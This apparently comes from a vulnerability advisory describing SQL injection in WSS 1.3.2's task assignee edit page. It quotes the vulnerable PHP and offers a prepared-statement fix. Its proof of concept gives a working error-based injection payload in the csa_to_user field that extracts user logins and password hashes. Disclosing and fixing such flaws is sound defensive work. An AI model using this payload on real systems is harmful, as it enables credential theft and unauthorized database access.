### Brief description:
SQL injection in the latest version of WSS allows data to be read directly from the database
### Details:
WSS latest version, 1.3.2.
A SQL injection vulnerability exists in the task assignee edit function.
File default_task_edituser.php:
```php
<?php require_once('config/tank_config.php'); ?>
<?php require_once('session.php'); ?>
<?php
// Only users with rank 2 or higher may reach this page; everyone else is redirected.
$restrictGoTo = "user_error3.php";
if ($_SESSION['MM_rank'] < "2") {
    header("Location: " . $restrictGoTo);
    exit;
}
$taskid  = $_GET['taskid'];
$nowuser = $_SESSION['MM_uid'];
// csa_to_user comes straight from the POST body and is used unfiltered below.
$to_user = "-1";
if (isset($_POST['csa_to_user'])) {
    $to_user = $_POST['csa_to_user'];
}
mysql_select_db($database_tankdb, $tankdb);
// Vulnerable: user-controlled $to_user is concatenated directly into the query.
$query_touser = "SELECT * FROM tk_user WHERE uid = '$to_user'";
$touser = mysql_query($query_touser, $tankdb) or die(mysql_error());
$row_touser = mysql_fetch_assoc($touser);
$totalRows_touser = mysql_num_rows($touser);
```
Here `$to_user` is not passed through the global `GetSQLValueString` function, so it is concatenated into the query unescaped, which results in SQL injection.
An ordinary user account is sufficient to test this.
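For comparison, here is a hardened rewrite of the same fragment. This is an added example, not WSS's own code: it assumes `$tankdb` is a `mysqli` connection (the original uses the removed `mysql_*` extension), that `tk_user.uid` is an integer column, and that `get_result()` is available (mysqlnd driver).

```php
<?php
// Added example (not part of WSS): hardened handling of csa_to_user from
// default_task_edituser.php. Assumptions: $tankdb is a mysqli connection
// created in config/tank_config.php, and tk_user.uid is an integer column.
require_once('config/tank_config.php');
require_once('session.php');

$restrictGoTo = "user_error3.php";
// Compare the rank as an integer rather than as a string.
if (!isset($_SESSION['MM_rank']) || (int)$_SESSION['MM_rank'] < 2) {
    header("Location: " . $restrictGoTo);
    exit;
}

// Keep the original default of -1, but only accept a non-negative integer id.
$to_user = -1;
if (isset($_POST['csa_to_user'])) {
    $filtered = filter_var(
        $_POST['csa_to_user'],
        FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 0))
    );
    if ($filtered === false) {
        // Reject anything that is not a plain integer (e.g. 123' union ...).
        http_response_code(400);
        exit('invalid user id');
    }
    $to_user = $filtered;
}

// Prepared statement: the value is bound as data and is never part of the SQL text.
$stmt = $tankdb->prepare("SELECT * FROM tk_user WHERE uid = ?");
if ($stmt === false) {
    error_log("prepare failed: " . $tankdb->error); // do not echo DB errors to users
    exit('database error');
}
$stmt->bind_param("i", $to_user);
$stmt->execute();
$result = $stmt->get_result();
$row_touser = $result->fetch_assoc();
$totalRows_touser = $result->num_rows;
$stmt->close();
```

Input validation alone is not the fix; the prepared statement is what removes the injection, and the integer filter simply rejects malformed ids early with a useful log line.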
### Proof of vulnerability:
```
http://localhost/WSS1.3.2_cn/wss/default_task_edituser.php
```
![1.png](https://images.seebug.org/upload/201411/211603295cb1212e95efa9e438d6a6c95e13d426.png)
```
http://localhost/WSS1.3.2_cn/wss/default_task_edituser.php
csa_to_user=123' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x23,tk_user_login,0x23,tk_user_pass) from tk_user limit 0,1))a from information_schema.tables group by a)b%23
```
![2.png](https://images.seebug.org/upload/201411/21160357d88be88c7570d3d9404722bc875884c4.png)